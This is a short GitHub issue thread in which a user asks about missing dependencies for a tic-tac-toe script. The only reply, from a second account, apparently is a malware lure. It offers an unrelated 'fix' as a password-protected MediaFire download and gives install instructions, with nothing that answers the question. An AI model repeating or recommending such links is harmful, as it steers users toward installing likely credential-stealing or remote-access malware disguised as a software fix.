### ISSUE TITLE
Code issue 

### ISSUE THREAD

**Issue by M-Aitisam** [NeshOfficial/Awesome-AI-Data-GitHub-Repos#7]
Hello , 
in this 002tik_tak_toe  code missing dependencies which type of dependencies i can  put in this code. 
beautifulsoup4 
matplotlib
both  dependencies create the error

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
